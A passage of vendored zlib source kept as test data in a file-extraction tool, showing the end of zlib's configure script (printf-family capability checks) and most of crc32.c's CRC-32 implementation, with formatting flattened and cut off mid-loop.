#include int mytest(const char *fmt, ...) { char buf[20]; va_list ap; va_start(ap, fmt); vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); return 0; } int main() { return (mytest("Hello%d\n", 1)); } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for vsnprintf() in stdio.h... Yes." | tee -a configure.log echo >> configure.log cat >$test.c < #include int mytest(const char *fmt, ...) { int n; char buf[20]; va_list ap; va_start(ap, fmt); n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); return n; } int main() { return (mytest("Hello%d\n", 1)); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of vsnprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_vsnprintf_void" SFLAGS="$SFLAGS -DHAS_vsnprintf_void" echo "Checking for return value of vsnprintf()... No." | tee -a configure.log echo " WARNING: apparently vsnprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi else CFLAGS="$CFLAGS -DNO_vsnprintf" SFLAGS="$SFLAGS -DNO_vsnprintf" echo "Checking for vsnprintf() in stdio.h... No." | tee -a configure.log echo " WARNING: vsnprintf() not found, falling back to vsprintf(). zlib" | tee -a configure.log echo " can build but will be open to possible buffer-overflow security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log echo >> configure.log cat >$test.c < #include int mytest(const char *fmt, ...) { int n; char buf[20]; va_list ap; va_start(ap, fmt); n = vsprintf(buf, fmt, ap); va_end(ap); return n; } int main() { return (mytest("Hello%d\n", 1)); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of vsprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_vsprintf_void" SFLAGS="$SFLAGS -DHAS_vsprintf_void" echo "Checking for return value of vsprintf()... No." | tee -a configure.log echo " WARNING: apparently vsprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi fi else echo "Checking whether to use vs[n]printf() or s[n]printf()... using s[n]printf()." | tee -a configure.log echo >> configure.log cat >$test.c < int mytest() { char buf[20]; snprintf(buf, sizeof(buf), "%s", "foo"); return 0; } int main() { return (mytest()); } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for snprintf() in stdio.h... Yes." | tee -a configure.log echo >> configure.log cat >$test.c < int mytest() { char buf[20]; return snprintf(buf, sizeof(buf), "%s", "foo"); } int main() { return (mytest()); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of snprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_snprintf_void" SFLAGS="$SFLAGS -DHAS_snprintf_void" echo "Checking for return value of snprintf()... No." | tee -a configure.log echo " WARNING: apparently snprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi else CFLAGS="$CFLAGS -DNO_snprintf" SFLAGS="$SFLAGS -DNO_snprintf" echo "Checking for snprintf() in stdio.h... No." | tee -a configure.log echo " WARNING: snprintf() not found, falling back to sprintf(). zlib" | tee -a configure.log echo " can build but will be open to possible buffer-overflow security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log echo >> configure.log cat >$test.c < int mytest() { char buf[20]; return sprintf(buf, "%s", "foo"); } int main() { return (mytest()); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of sprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_sprintf_void" SFLAGS="$SFLAGS -DHAS_sprintf_void" echo "Checking for return value of sprintf()... No." | tee -a configure.log echo " WARNING: apparently sprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi fi fi # see if we can hide zlib internal symbols that are linked between separate source files if test "$gcc" -eq 1; then echo >> configure.log cat > $test.c <> configure.log echo ALL = $ALL >> configure.log echo AR = $AR >> configure.log echo ARFLAGS = $ARFLAGS >> configure.log echo CC = $CC >> configure.log echo CFLAGS = $CFLAGS >> configure.log echo CPP = $CPP >> configure.log echo EXE = $EXE >> configure.log echo LDCONFIG = $LDCONFIG >> configure.log echo LDFLAGS = $LDFLAGS >> configure.log echo LDSHARED = $LDSHARED >> configure.log echo LDSHAREDLIBC = $LDSHAREDLIBC >> configure.log echo OBJC = $OBJC >> configure.log echo PIC_OBJC = $PIC_OBJC >> configure.log echo RANLIB = $RANLIB >> configure.log echo SFLAGS = $SFLAGS >> configure.log echo SHAREDLIB = $SHAREDLIB >> configure.log echo SHAREDLIBM = $SHAREDLIBM >> configure.log echo SHAREDLIBV = $SHAREDLIBV >> configure.log echo STATICLIB = $STATICLIB >> configure.log echo TEST = $TEST >> configure.log echo VER = $VER >> configure.log echo SRCDIR = $SRCDIR >> configure.log echo exec_prefix = $exec_prefix >> configure.log echo includedir = $includedir >> configure.log echo libdir = $libdir >> configure.log echo mandir = $mandir >> configure.log echo prefix = $prefix >> configure.log echo sharedlibdir = $sharedlibdir >> configure.log echo uname = $uname >> configure.log # update Makefile with the configure results sed < ${SRCDIR}Makefile.in " /^CC *=/s#=.*#=$CC# /^CFLAGS *=/s#=.*#=$CFLAGS# /^SFLAGS *=/s#=.*#=$SFLAGS# /^LDFLAGS *=/s#=.*#=$LDFLAGS# /^LDSHARED *=/s#=.*#=$LDSHARED# /^CPP *=/s#=.*#=$CPP# /^STATICLIB *=/s#=.*#=$STATICLIB# /^SHAREDLIB *=/s#=.*#=$SHAREDLIB# /^SHAREDLIBV *=/s#=.*#=$SHAREDLIBV# /^SHAREDLIBM *=/s#=.*#=$SHAREDLIBM# /^AR *=/s#=.*#=$AR# /^ARFLAGS *=/s#=.*#=$ARFLAGS# /^RANLIB *=/s#=.*#=$RANLIB# /^LDCONFIG *=/s#=.*#=$LDCONFIG# /^LDSHAREDLIBC *=/s#=.*#=$LDSHAREDLIBC# /^EXE *=/s#=.*#=$EXE# /^SRCDIR *=/s#=.*#=$SRCDIR# /^ZINC *=/s#=.*#=$ZINC# /^ZINCOUT *=/s#=.*#=$ZINCOUT# /^prefix *=/s#=.*#=$prefix# /^exec_prefix *=/s#=.*#=$exec_prefix# /^libdir *=/s#=.*#=$libdir# /^sharedlibdir *=/s#=.*#=$sharedlibdir# /^includedir *=/s#=.*#=$includedir# /^mandir *=/s#=.*#=$mandir# /^OBJC *=/s#=.*#= $OBJC# /^PIC_OBJC *=/s#=.*#= $PIC_OBJC# /^all: */s#:.*#: $ALL# /^test: */s#:.*#: $TEST# " > Makefile # create zlib.pc with the configure results sed < ${SRCDIR}zlib.pc.in " /^CC *=/s#=.*#=$CC# /^CFLAGS *=/s#=.*#=$CFLAGS# /^CPP *=/s#=.*#=$CPP# /^LDSHARED *=/s#=.*#=$LDSHARED# /^STATICLIB *=/s#=.*#=$STATICLIB# /^SHAREDLIB *=/s#=.*#=$SHAREDLIB# /^SHAREDLIBV *=/s#=.*#=$SHAREDLIBV# /^SHAREDLIBM *=/s#=.*#=$SHAREDLIBM# /^AR *=/s#=.*#=$AR# /^ARFLAGS *=/s#=.*#=$ARFLAGS# /^RANLIB *=/s#=.*#=$RANLIB# /^EXE *=/s#=.*#=$EXE# /^prefix *=/s#=.*#=$prefix# /^exec_prefix *=/s#=.*#=$exec_prefix# /^libdir *=/s#=.*#=$libdir# /^sharedlibdir *=/s#=.*#=$sharedlibdir# /^includedir *=/s#=.*#=$includedir# /^mandir *=/s#=.*#=$mandir# /^LDFLAGS *=/s#=.*#=$LDFLAGS# " | sed -e " s/\@VERSION\@/$VER/g; " > zlib.pc # done leave 0 ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/crc32.c ================================================ /* crc32.c -- compute the CRC-32 of a data stream * Copyright (C) 1995-2022 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h * * This interleaved implementation of a CRC makes use of pipelined multiple * arithmetic-logic units, commonly found in modern CPU cores. It is due to * Kadatch and Jenkins (2010). See doc/crc-doc.1.0.pdf in this distribution. */ /* @(#) $Id$ */ /* Note on the use of DYNAMIC_CRC_TABLE: there is no mutex or semaphore protection on the static variables used to control the first-use generation of the crc tables. Therefore, if you #define DYNAMIC_CRC_TABLE, you should first call get_crc_table() to initialize the tables before allowing more than one thread to use crc32(). MAKECRCH can be #defined to write out crc32.h. A main() routine is also produced, so that this one source file can be compiled to an executable. */ #ifdef MAKECRCH # include # ifndef DYNAMIC_CRC_TABLE # define DYNAMIC_CRC_TABLE # endif /* !DYNAMIC_CRC_TABLE */ #endif /* MAKECRCH */ #include "zutil.h" /* for Z_U4, Z_U8, z_crc_t, and FAR definitions */ /* A CRC of a message is computed on N braids of words in the message, where each word consists of W bytes (4 or 8). If N is 3, for example, then three running sparse CRCs are calculated respectively on each braid, at these indices in the array of words: 0, 3, 6, ..., 1, 4, 7, ..., and 2, 5, 8, ... This is done starting at a word boundary, and continues until as many blocks of N * W bytes as are available have been processed. The results are combined into a single CRC at the end. For this code, N must be in the range 1..6 and W must be 4 or 8. The upper limit on N can be increased if desired by adding more #if blocks, extending the patterns apparent in the code. In addition, crc32.h would need to be regenerated, if the maximum N value is increased. N and W are chosen empirically by benchmarking the execution time on a given processor. The choices for N and W below were based on testing on Intel Kaby Lake i7, AMD Ryzen 7, ARM Cortex-A57, Sparc64-VII, PowerPC POWER9, and MIPS64 Octeon II processors. The Intel, AMD, and ARM processors were all fastest with N=5, W=8. The Sparc, PowerPC, and MIPS64 were all fastest at N=5, W=4. They were all tested with either gcc or clang, all using the -O3 optimization level. Your mileage may vary. */ /* Define N */ #ifdef Z_TESTN # define N Z_TESTN #else # define N 5 #endif #if N < 1 || N > 6 # error N must be in 1..6 #endif /* z_crc_t must be at least 32 bits. z_word_t must be at least as long as z_crc_t. It is assumed here that z_word_t is either 32 bits or 64 bits, and that bytes are eight bits. */ /* Define W and the associated z_word_t type. If W is not defined, then a braided calculation is not used, and the associated tables and code are not compiled. */ #ifdef Z_TESTW # if Z_TESTW-1 != -1 # define W Z_TESTW # endif #else # ifdef MAKECRCH # define W 8 /* required for MAKECRCH */ # else # if defined(__x86_64__) || defined(__aarch64__) # define W 8 # else # define W 4 # endif # endif #endif #ifdef W # if W == 8 && defined(Z_U8) typedef Z_U8 z_word_t; # elif defined(Z_U4) # undef W # define W 4 typedef Z_U4 z_word_t; # else # undef W # endif #endif /* If available, use the ARM processor CRC32 instruction. */ #if defined(__aarch64__) && defined(__ARM_FEATURE_CRC32) && W == 8 # define ARMCRC32 #endif #if defined(W) && (!defined(ARMCRC32) || defined(DYNAMIC_CRC_TABLE)) /* Swap the bytes in a z_word_t to convert between little and big endian. Any self-respecting compiler will optimize this to a single machine byte-swap instruction, if one is available. This assumes that word_t is either 32 bits or 64 bits. */ local z_word_t byte_swap(z_word_t word) { # if W == 8 return (word & 0xff00000000000000) >> 56 | (word & 0xff000000000000) >> 40 | (word & 0xff0000000000) >> 24 | (word & 0xff00000000) >> 8 | (word & 0xff000000) << 8 | (word & 0xff0000) << 24 | (word & 0xff00) << 40 | (word & 0xff) << 56; # else /* W == 4 */ return (word & 0xff000000) >> 24 | (word & 0xff0000) >> 8 | (word & 0xff00) << 8 | (word & 0xff) << 24; # endif } #endif #ifdef DYNAMIC_CRC_TABLE /* ========================================================================= * Table of powers of x for combining CRC-32s, filled in by make_crc_table() * below. */ local z_crc_t FAR x2n_table[32]; #else /* ========================================================================= * Tables for byte-wise and braided CRC-32 calculations, and a table of powers * of x for combining CRC-32s, all made by make_crc_table(). */ # include "crc32.h" #endif /* CRC polynomial. */ #define POLY 0xedb88320 /* p(x) reflected, with x^32 implied */ /* Return a(x) multiplied by b(x) modulo p(x), where p(x) is the CRC polynomial, reflected. For speed, this requires that a not be zero. */ local z_crc_t multmodp(z_crc_t a, z_crc_t b) { z_crc_t m, p; m = (z_crc_t)1 << 31; p = 0; for (;;) { if (a & m) { p ^= b; if ((a & (m - 1)) == 0) break; } m >>= 1; b = b & 1 ? (b >> 1) ^ POLY : b >> 1; } return p; } /* Return x^(n * 2^k) modulo p(x). Requires that x2n_table[] has been initialized. */ local z_crc_t x2nmodp(z_off64_t n, unsigned k) { z_crc_t p; p = (z_crc_t)1 << 31; /* x^0 == 1 */ while (n) { if (n & 1) p = multmodp(x2n_table[k & 31], p); n >>= 1; k++; } return p; } #ifdef DYNAMIC_CRC_TABLE /* ========================================================================= * Build the tables for byte-wise and braided CRC-32 calculations, and a table * of powers of x for combining CRC-32s. */ local z_crc_t FAR crc_table[256]; #ifdef W local z_word_t FAR crc_big_table[256]; local z_crc_t FAR crc_braid_table[W][256]; local z_word_t FAR crc_braid_big_table[W][256]; local void braid(z_crc_t [][256], z_word_t [][256], int, int); #endif #ifdef MAKECRCH local void write_table(FILE *, const z_crc_t FAR *, int); local void write_table32hi(FILE *, const z_word_t FAR *, int); local void write_table64(FILE *, const z_word_t FAR *, int); #endif /* MAKECRCH */ /* Define a once() function depending on the availability of atomics. If this is compiled with DYNAMIC_CRC_TABLE defined, and if CRCs will be computed in multiple threads, and if atomics are not available, then get_crc_table() must be called to initialize the tables and must return before any threads are allowed to compute or combine CRCs. */ /* Definition of once functionality. */ typedef struct once_s once_t; /* Check for the availability of atomics. */ #if defined(__STDC__) && __STDC_VERSION__ >= 201112L && \ !defined(__STDC_NO_ATOMICS__) #include /* Structure for once(), which must be initialized with ONCE_INIT. */ struct once_s { atomic_flag begun; atomic_int done; }; #define ONCE_INIT {ATOMIC_FLAG_INIT, 0} /* Run the provided init() function exactly once, even if multiple threads invoke once() at the same time. The state must be a once_t initialized with ONCE_INIT. */ local void once(once_t *state, void (*init)(void)) { if (!atomic_load(&state->done)) { if (atomic_flag_test_and_set(&state->begun)) while (!atomic_load(&state->done)) ; else { init(); atomic_store(&state->done, 1); } } } #else /* no atomics */ /* Structure for once(), which must be initialized with ONCE_INIT. */ struct once_s { volatile int begun; volatile int done; }; #define ONCE_INIT {0, 0} /* Test and set. Alas, not atomic, but tries to minimize the period of vulnerability. */ local int test_and_set(int volatile *flag) { int was; was = *flag; *flag = 1; return was; } /* Run the provided init() function once. This is not thread-safe. */ local void once(once_t *state, void (*init)(void)) { if (!state->done) { if (test_and_set(&state->begun)) while (!state->done) ; else { init(); state->done = 1; } } } #endif /* State for once(). */ local once_t made = ONCE_INIT; /* Generate tables for a byte-wise 32-bit CRC calculation on the polynomial: x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x+1. Polynomials over GF(2) are represented in binary, one bit per coefficient, with the lowest powers in the most significant bit. Then adding polynomials is just exclusive-or, and multiplying a polynomial by x is a right shift by one. If we call the above polynomial p, and represent a byte as the polynomial q, also with the lowest power in the most significant bit (so the byte 0xb1 is the polynomial x^7+x^3+x^2+1), then the CRC is (q*x^32) mod p, where a mod b means the remainder after dividing a by b. This calculation is done using the shift-register method of multiplying and taking the remainder. The register is initialized to zero, and for each incoming bit, x^32 is added mod p to the register if the bit is a one (where x^32 mod p is p+x^32 = x^26+...+1), and the register is multiplied mod p by x (which is shifting right by one and adding x^32 mod p if the bit shifted out is a one). We start with the highest power (least significant bit) of q and repeat for all eight bits of q. The table is simply the CRC of all possible eight bit values. This is all the information needed to generate CRCs on data a byte at a time for all combinations of CRC register values and incoming bytes. */ local void make_crc_table(void) { unsigned i, j, n; z_crc_t p; /* initialize the CRC of bytes tables */ for (i = 0; i < 256; i++) { p = i; for (j = 0; j < 8; j++) p = p & 1 ? (p >> 1) ^ POLY : p >> 1; crc_table[i] = p; #ifdef W crc_big_table[i] = byte_swap(p); #endif } /* initialize the x^2^n mod p(x) table */ p = (z_crc_t)1 << 30; /* x^1 */ x2n_table[0] = p; for (n = 1; n < 32; n++) x2n_table[n] = p = multmodp(p, p); #ifdef W /* initialize the braiding tables -- needs x2n_table[] */ braid(crc_braid_table, crc_braid_big_table, N, W); #endif #ifdef MAKECRCH { /* The crc32.h header file contains tables for both 32-bit and 64-bit z_word_t's, and so requires a 64-bit type be available. In that case, z_word_t must be defined to be 64-bits. This code then also generates and writes out the tables for the case that z_word_t is 32 bits. */ #if !defined(W) || W != 8 # error Need a 64-bit integer type in order to generate crc32.h. #endif FILE *out; int k, n; z_crc_t ltl[8][256]; z_word_t big[8][256]; out = fopen("crc32.h", "w"); if (out == NULL) return; /* write out little-endian CRC table to crc32.h */ fprintf(out, "/* crc32.h -- tables for rapid CRC calculation\n" " * Generated automatically by crc32.c\n */\n" "\n" "local const z_crc_t FAR crc_table[] = {\n" " "); write_table(out, crc_table, 256); fprintf(out, "};\n"); /* write out big-endian CRC table for 64-bit z_word_t to crc32.h */ fprintf(out, "\n" "#ifdef W\n" "\n" "#if W == 8\n" "\n" "local const z_word_t FAR crc_big_table[] = {\n" " "); write_table64(out, crc_big_table, 256); fprintf(out, "};\n"); /* write out big-endian CRC table for 32-bit z_word_t to crc32.h */ fprintf(out, "\n" "#else /* W == 4 */\n" "\n" "local const z_word_t FAR crc_big_table[] = {\n" " "); write_table32hi(out, crc_big_table, 256); fprintf(out, "};\n" "\n" "#endif\n"); /* write out braid tables for each value of N */ for (n = 1; n <= 6; n++) { fprintf(out, "\n" "#if N == %d\n", n); /* compute braid tables for this N and 64-bit word_t */ braid(ltl, big, n, 8); /* write out braid tables for 64-bit z_word_t to crc32.h */ fprintf(out, "\n" "#if W == 8\n" "\n" "local const z_crc_t FAR crc_braid_table[][256] = {\n"); for (k = 0; k < 8; k++) { fprintf(out, " {"); write_table(out, ltl[k], 256); fprintf(out, "}%s", k < 7 ? ",\n" : ""); } fprintf(out, "};\n" "\n" "local const z_word_t FAR crc_braid_big_table[][256] = {\n"); for (k = 0; k < 8; k++) { fprintf(out, " {"); write_table64(out, big[k], 256); fprintf(out, "}%s", k < 7 ? ",\n" : ""); } fprintf(out, "};\n"); /* compute braid tables for this N and 32-bit word_t */ braid(ltl, big, n, 4); /* write out braid tables for 32-bit z_word_t to crc32.h */ fprintf(out, "\n" "#else /* W == 4 */\n" "\n" "local const z_crc_t FAR crc_braid_table[][256] = {\n"); for (k = 0; k < 4; k++) { fprintf(out, " {"); write_table(out, ltl[k], 256); fprintf(out, "}%s", k < 3 ? ",\n" : ""); } fprintf(out, "};\n" "\n" "local const z_word_t FAR crc_braid_big_table[][256] = {\n"); for (k = 0; k < 4; k++) { fprintf(out, " {"); write_table32hi(out, big[k], 256); fprintf(out, "}%s", k < 3 ? ",\n" : ""); } fprintf(out, "};\n" "\n" "#endif\n" "\n" "#endif\n"); } fprintf(out, "\n" "#endif\n"); /* write out zeros operator table to crc32.h */ fprintf(out, "\n" "local const z_crc_t FAR x2n_table[] = {\n" " "); write_table(out, x2n_table, 32); fprintf(out, "};\n"); fclose(out); } #endif /* MAKECRCH */ } #ifdef MAKECRCH /* Write the 32-bit values in table[0..k-1] to out, five per line in hexadecimal separated by commas. */ local void write_table(FILE *out, const z_crc_t FAR *table, int k) { int n; for (n = 0; n < k; n++) fprintf(out, "%s0x%08lx%s", n == 0 || n % 5 ? "" : " ", (unsigned long)(table[n]), n == k - 1 ? "" : (n % 5 == 4 ? ",\n" : ", ")); } /* Write the high 32-bits of each value in table[0..k-1] to out, five per line in hexadecimal separated by commas. */ local void write_table32hi(FILE *out, const z_word_t FAR *table, int k) { int n; for (n = 0; n < k; n++) fprintf(out, "%s0x%08lx%s", n == 0 || n % 5 ? "" : " ", (unsigned long)(table[n] >> 32), n == k - 1 ? "" : (n % 5 == 4 ? ",\n" : ", ")); } /* Write the 64-bit values in table[0..k-1] to out, three per line in hexadecimal separated by commas. This assumes that if there is a 64-bit type, then there is also a long long integer type, and it is at least 64 bits. If not, then the type cast and format string can be adjusted accordingly. */ local void write_table64(FILE *out, const z_word_t FAR *table, int k) { int n; for (n = 0; n < k; n++) fprintf(out, "%s0x%016llx%s", n == 0 || n % 3 ? "" : " ", (unsigned long long)(table[n]), n == k - 1 ? "" : (n % 3 == 2 ? ",\n" : ", ")); } /* Actually do the deed. */ int main(void) { make_crc_table(); return 0; } #endif /* MAKECRCH */ #ifdef W /* Generate the little and big-endian braid tables for the given n and z_word_t size w. Each array must have room for w blocks of 256 elements. */ local void braid(z_crc_t ltl[][256], z_word_t big[][256], int n, int w) { int k; z_crc_t i, p, q; for (k = 0; k < w; k++) { p = x2nmodp((n * w + 3 - k) << 3, 0); ltl[k][0] = 0; big[w - 1 - k][0] = 0; for (i = 1; i < 256; i++) { ltl[k][i] = q = multmodp(i << 24, p); big[w - 1 - k][i] = byte_swap(q); } } } #endif #endif /* DYNAMIC_CRC_TABLE */ /* ========================================================================= * This function can be used by asm versions of crc32(), and to force the * generation of the CRC tables in a threaded application. */ const z_crc_t FAR * ZEXPORT get_crc_table(void) { #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ return (const z_crc_t FAR *)crc_table; } /* ========================================================================= * Use ARM machine instructions if available. This will compute the CRC about * ten times faster than the braided calculation. This code does not check for * the presence of the CRC instruction at run time. __ARM_FEATURE_CRC32 will * only be defined if the compilation specifies an ARM processor architecture * that has the instructions. For example, compiling with -march=armv8.1-a or * -march=armv8-a+crc, or -march=native if the compile machine has the crc32 * instructions. */ #ifdef ARMCRC32 /* Constants empirically determined to maximize speed. These values are from measurements on a Cortex-A57. Your mileage may vary. */ #define Z_BATCH 3990 /* number of words in a batch */ #define Z_BATCH_ZEROS 0xa10d3d0c /* computed from Z_BATCH = 3990 */ #define Z_BATCH_MIN 800 /* fewest words in a final batch */ unsigned long ZEXPORT crc32_z(unsigned long crc, const unsigned char FAR *buf, z_size_t len) { z_crc_t val; z_word_t crc1, crc2; const z_word_t *word; z_word_t val0, val1, val2; z_size_t last, last2, i; z_size_t num; /* Return initial CRC, if requested. */ if (buf == Z_NULL) return 0; #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ /* Pre-condition the CRC */ crc = (~crc) & 0xffffffff; /* Compute the CRC up to a word boundary. */ while (len && ((z_size_t)buf & 7) != 0) { len--; val = *buf++; __asm__ volatile("crc32b %w0, %w0, %w1" : "+r"(crc) : "r"(val)); } /* Prepare to compute the CRC on full 64-bit words word[0..num-1]. */ word = (z_word_t const *)buf; num = len >> 3; len &= 7; /* Do three interleaved CRCs to realize the throughput of one crc32x instruction per cycle. Each CRC is calculated on Z_BATCH words. The three CRCs are combined into a single CRC after each set of batches. */ while (num >= 3 * Z_BATCH) { crc1 = 0; crc2 = 0; for (i = 0; i < Z_BATCH; i++) { val0 = word[i]; val1 = word[i + Z_BATCH]; val2 = word[i + 2 * Z_BATCH]; __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc) : "r"(val0)); __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc1) : "r"(val1)); __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc2) : "r"(val2)); } word += 3 * Z_BATCH; num -= 3 * Z_BATCH; crc = multmodp(Z_BATCH_ZEROS, crc) ^ crc1; crc = multmodp(Z_BATCH_ZEROS, crc) ^ crc2; } /* Do one last smaller batch with the remaining words, if there are enough to pay for the combination of CRCs. */ last = num / 3; if (last >= Z_BATCH_MIN) { last2 = last << 1; crc1 = 0; crc2 = 0; for (i = 0; i < last; i++) { val0 = word[i]; val1 = word[i + last]; val2 = word[i + last2]; __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc) : "r"(val0)); __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc1) : "r"(val1)); __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc2) : "r"(val2)); } word += 3 * last; num -= 3 * last; val = x2nmodp(last, 6); crc = multmodp(val, crc) ^ crc1; crc = multmodp(val, crc) ^ crc2; } /* Compute the CRC on any remaining words. */ for (i = 0; i < num; i++) { val0 = word[i]; __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc) : "r"(val0)); } word += num; /* Complete the CRC on any remaining bytes. */ buf = (const unsigned char FAR *)word; while (len) { len--; val = *buf++; __asm__ volatile("crc32b %w0, %w0, %w1" : "+r"(crc) : "r"(val)); } /* Return the CRC, post-conditioned. */ return crc ^ 0xffffffff; } #else #ifdef W /* Return the CRC of the W bytes in the word_t data, taking the least-significant byte of the word as the first byte of data, without any pre or post conditioning. This is used to combine the CRCs of each braid. */ local z_crc_t crc_word(z_word_t data) { int k; for (k = 0; k < W; k++) data = (data >> 8) ^ crc_table[data & 0xff]; return (z_crc_t)data; } local z_word_t crc_word_big(z_word_t data) { int k; for (k = 0; k < W; k++) data = (data << 8) ^ crc_big_table[(data >> ((W - 1) << 3)) & 0xff]; return data; } #endif /* ========================================================================= */ unsigned long ZEXPORT crc32_z(unsigned long crc, const unsigned char FAR *buf, z_size_t len) { /* Return initial CRC, if requested. */ if (buf == Z_NULL) return 0; #ifdef DYNAMIC_CRC_TABLE once(&made, make_crc_table); #endif /* DYNAMIC_CRC_TABLE */ /* Pre-condition the CRC */ crc = (~crc) & 0xffffffff; #ifdef W /* If provided enough bytes, do a braided CRC calculation. */ if (len >= N * W + W - 1) { z_size_t blks; z_word_t const *words; unsigned endian; int k; /* Compute the CRC up to a z_word_t boundary. */ while (len && ((z_size_t)buf & (W - 1)) != 0) { len--; crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff]; } /* Compute the CRC on as many N z_word_t blocks as are available. */ blks = len / (N * W); len -= blks * N * W; words = (z_word_t const *)buf; /* Do endian check at execution time instead of compile time, since ARM processors can change the endianness at execution time. If the compiler knows what the endianness will be, it can optimize out the check and the unused branch. */ endian = 1; if (*(unsigned char *)&endian) { /* Little endian. */ z_crc_t crc0; z_word_t word0; #if N > 1 z_crc_t crc1; z_word_t word1; #if N > 2 z_crc_t crc2; z_word_t word2; #if N > 3 z_crc_t crc3; z_word_t word3; #if N > 4 z_crc_t crc4; z_word_t word4; #if N > 5 z_crc_t crc5; z_word_t word5; #endif #endif #endif #endif #endif /* Initialize the CRC for each braid. */ crc0 = crc; #if N > 1 crc1 = 0; #if N > 2 crc2 = 0; #if N > 3 crc3 = 0; #if N > 4 crc4 = 0; #if N > 5 crc5 = 0; #endif #endif #endif #endif #endif /* Process the first blks-1 blocks, computing the CRCs on each braid independently. */ while (--blks) { /* Load the word for each braid into registers. */ word0 = crc0 ^ words[0]; #if N > 1 word1 = crc1 ^ words[1]; #if N > 2 word2 = crc2 ^ words[2]; #if N > 3 word3 = crc3 ^ words[3]; #if N > 4 word4 = crc4 ^ words[4]; #if N > 5 word5 = crc5 ^ words[5]; #endif #endif #endif #endif #endif words += N; /* Compute and update the CRC for each word. The loop should get unrolled. */ crc0 = crc_braid_table[0][word0 & 0xff]; #if N > 1 crc1 = crc_braid_table[0][word1 & 0xff]; #if N > 2 crc2 = crc_braid_table[0][word2 & 0xff]; #if N > 3 crc3 = crc_braid_table[0][word3 & 0xff]; #if N > 4 crc4 = crc_braid_table[0][word4 & 0xff]; #if N > 5 crc5 = crc_braid_table[0][word5 & 0xff]; #endif #endif #endif #endif #endif for (k = 1; k < W; k++) { crc0 ^= crc_braid_table[k][(word0 >> (k << 3)) & 0xff]; #if N > 1 crc1 ^= crc_braid_table[k][(word1 >> (k << 3)) & 0xff]; #if N > 2 crc2 ^= crc_braid_table[k][(word2 >> (k << 3)) & 0xff]; #if N > 3 crc3 ^= crc_braid_table[k][(word3 >> (k << 3)) & 0xff]; #if N > 4 crc4 ^= crc_braid_table[k][(word4 >> (k << 3)) & 0xff]; #if N > 5 crc5 ^= crc_braid_table[k][(word5 >> (k << 3)) & 0xff]; #endif #endif #endif #endif #endif } } /* Process the last block, combining the CRCs of the N braids at the same time. */ crc = crc_word(crc0 ^ words[0]); #if N > 1 crc = crc_word(crc1 ^ words[1] ^ crc); #if N > 2 crc = crc_word(crc2 ^ words[2] ^ crc); #if N > 3 crc = crc_word(crc3 ^ words[3] ^ crc); #if N > 4 crc = crc_word(crc4 ^ words[4] ^ crc); #if N > 5 crc = crc_word(crc5 ^ words[5] ^ crc); #endif #endif #endif #endif #endif words += N; } else { /* Big endian. */ z_word_t crc0, word0, comb; #if N > 1 z_word_t crc1, word1; #if N > 2 z_word_t crc2, word2; #if N > 3 z_word_t crc3, word3; #if N > 4 z_word_t crc4, word4; #if N > 5 z_word_t crc5, word5; #endif #endif #endif #endif #endif /* Initialize the CRC for each braid. */ crc0 = byte_swap(crc); #if N > 1 crc1 = 0; #if N > 2 crc2 = 0; #if N > 3 crc3 = 0; #if N > 4 crc4 = 0; #if N > 5 crc5 = 0; #endif #endif #endif #endif #endif /* Process the first blks-1 blocks, computing the CRCs on each braid independently. */ while (--blks) { /* Load the word for each braid into registers. */ word0 = crc0 ^ words[0]; #if N > 1 word1 = crc1 ^ words[1]; #if N > 2 word2 = crc2 ^ words[2]; #if N > 3 word3 = crc3 ^ words[3]; #if N > 4 word4 = crc4 ^ words[4]; #if N > 5 word5 = crc5 ^ words[5]; #endif #endif #endif #endif #endif words += N; /* Compute and update the CRC for each word. The loop should get unrolled. */ crc0 = crc_braid_big_table[0][word0 & 0xff]; #if N > 1 crc1 = crc_braid_big_table[0][word1 & 0xff]; #if N > 2 crc2 = crc_braid_big_table[0][word2 & 0xff]; #if N > 3 crc3 = crc_braid_big_table[0][word3 & 0xff]; #if N > 4 crc4 = crc_braid_big_table[0][word4 & 0xff]; #if N > 5 crc5 = crc_braid_big_table[0][word5 & 0xff]; #endif #endif #endif #endif #endif for (k = 1; k < W; k++) { crc0 ^= crc_braid_big_table[k][(word0 >> (k << 3)) & 0xff]; #if N > 1 crc1 ^= crc_braid_big_table[k][(word1 >> (k << 3)) & 0xff]; #if N > 2 crc2 